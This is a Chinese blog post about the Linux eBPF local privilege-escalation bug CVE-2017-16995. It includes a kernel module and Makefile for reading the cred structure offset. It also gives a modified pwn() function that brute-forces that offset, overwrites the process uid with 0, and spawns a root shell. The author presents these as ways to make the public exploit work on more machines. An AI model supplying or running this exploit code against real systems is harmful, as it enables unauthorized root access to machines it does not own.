CVE-2017-16995


title: CVE-2017-16995
date: 2018-03-21 02:02:35
tags: linux-kernel-exploits


Ubuntu本地提权攻击预警

漏洞描述

该漏洞存在于带有 eBPF bpf(2)系统(CONFIG_BPF_SYSCALL)编译支持的Linux内核中,是一个内存任意读写漏洞。该漏洞是由于eBPF验证模块的计算错误产生的。普通用户可以构造特殊的BPF来触发该漏洞,此外恶意攻击者也可以使用该漏洞来进行本地提权操作。

POC

原作者exp此处可下载(可能需要梯子,这里copy了一份),然而直接运行,很多机器是无法提权成功的。

源代码注释头有说到:

if different kernel adjust CRED offset + check kernel stack size

针对这个魔鬼数字:CRED_OFFSET=0x5f8

魔鬼数字:CRED_OFFSET

这篇文章也说明了真相:

cred结构体的偏移量可能因为内核版本不同、内核编译选项不同而出现差异,作者给的exp偏移量是写死的

此文作者也给出了一种应对之策:

获取cred offset常量(一)

通过以下方法可获取这个cred offset:

1、getCredOffset.c

#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/init.h>
#include <linux/slab.h>
#include <linux/kthread.h>
#include <linux/errno.h>
#include <linux/types.h>
int init_module()
{
    printk("[!]current cred offset:%x\n",(unsigned long)&(current->cred)-(unsigned long)current);
    return 0;
}
void cleanup_module()
{
    printk("module cleanup\n");
}

2、Makefile

obj-m += getCredOffset.o
 
all:
        make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
         
clean:
        make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean

3、编译

make

4、执行

sudo insmod getCredOffset.ko

该命令需要有sudo权限的用户执行,通过insmod命令将getCredOffset模块注入内核

5、获取cred offset

dmesg | grep "cred offset"

另开一个命令行执行该命令即可获取到cred offset,最后替换掉原exp中的偏移量即可成功提权。

然而,虽提权成功了,但此法有点怪异,本来想普通用户提权,但却需要用root用户执行命令来协助,有点力不从心。

那么问题又来了,该如何在不同的机器上动态获取这个cred offset呢?

获取cred offset常量——暴力尝试

经过上文作者的点拨:

这个漏洞是个任意地址读写漏洞,所以也可以在确定task_struct地址之后,以当前用户的uid为特征去搜索内存,毕竟cred离task_struct不远。

加上代码中有多处__read命令,以及getuid()命令,这两个命令都可以读取uid
首先想到的是在往uidptr对应的地址中写0之前获取此时的uid值,通过以上两种方式对比看有什么差异:

printf("uidptr      = %lx\n", uidptr);
uid_get=getuid();
uid_read=__read(uidptr);
printf("uid get=%lx,read=%lx\n",uid_get, uid_read);

__write(uidptr, 0); // set both uid and gid to 0

if (getuid() == 0) {
    printf("spawning root shell\n");
    system("/bin/bash");
    exit(0);
}

果然如下图所示:

提权成功

那么规律来了,我们可以尝试以不同的cred offset来获取两个uid来进行对比,一旦对比上,姑且就当做找到了这个“确定”的值,然后再去write(0)。修改pwn函数如下:

static void pwn(uint64_t credoffset) {
    uint64_t fp, sp, ts, credadd, credptr, uidptr, uid_get, uid_read;
    fp = __get_fp();
    if (fp < PHYS_OFFSET)
        __exit("bogus fp");
    
    sp = get_sp(fp);
    if (sp < PHYS_OFFSET)
        __exit("bogus sp");
    
    ts = __read(sp);

    if (ts < PHYS_OFFSET)
        __exit("bogus task ptr");

    printf("task_struct = %lx\n", ts);

    uid_get=getuid();
    for(credoffset=0x400;credoffset<0x800;credoffset++){
        credadd=ts + credoffset;
        printf("credadd     = %lx\n", credadd);
        credptr = __read(credadd); // cred
        printf("credptr     = %lx\n", credptr);
        if (credptr < PHYS_OFFSET){
            continue;
        }
        uidptr = credptr + UID_OFFSET; // uid
        if (uidptr < PHYS_OFFSET){
            continue;
        }
        printf("uidptr      = %lx\n", uidptr);
        uid_read=__read(uidptr);
        printf("uid get=%lx,read=%lx\n",uid_get, uid_read);
        if((uid_read&0xffffffff)==uid_get){
            printf("uid get=%lx,read=%lx\n",uid_get, uid_read);
            __write(uidptr, 0); // set both uid and gid to 0
            printf("cred_offset = %lx\n", credoffset);
            if (getuid() == 0) {
                printf("spawning root shell\n");
                system("/bin/bash");
                exit(0);
            }
            printf("failed\n");
            break;
        }
    }
}

想到原作者Vitaly Nikolenko给的CRED_OFFSET=0x5f8,我这边通过rebeyond这里给出的方法获取的是0x670,猜测这个值应该范围不大,尝试了一下用0x400~0x800爆破,很不幸,第一次尝试失败,被系统给killed掉啦:

系统不听话了

调整一下范围:0x500~0x800,ok 搞定!

系统还是很乖的~

不同机器此CRED_OFFSET偏移量可能还有差异,可以视情况稍微调整一下范围,试出结果应该不难。

最后来体验一把提权后带来的快感,root用户想干嘛干嘛,如图:

root用户想干嘛干嘛~

完整代码见这里

参考链接:

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 203,362评论 5 477
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 85,330评论 2 381
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 150,247评论 0 337
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,560评论 1 273
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,580评论 5 365
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,569评论 1 281
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 37,929评论 3 395
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,587评论 0 258
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 40,840评论 1 297
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,596评论 2 321
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,678评论 1 329
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,366评论 4 318
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 38,945评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,929评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,165评论 1 259
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 43,271评论 2 349
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,403评论 2 342

推荐阅读更多精彩内容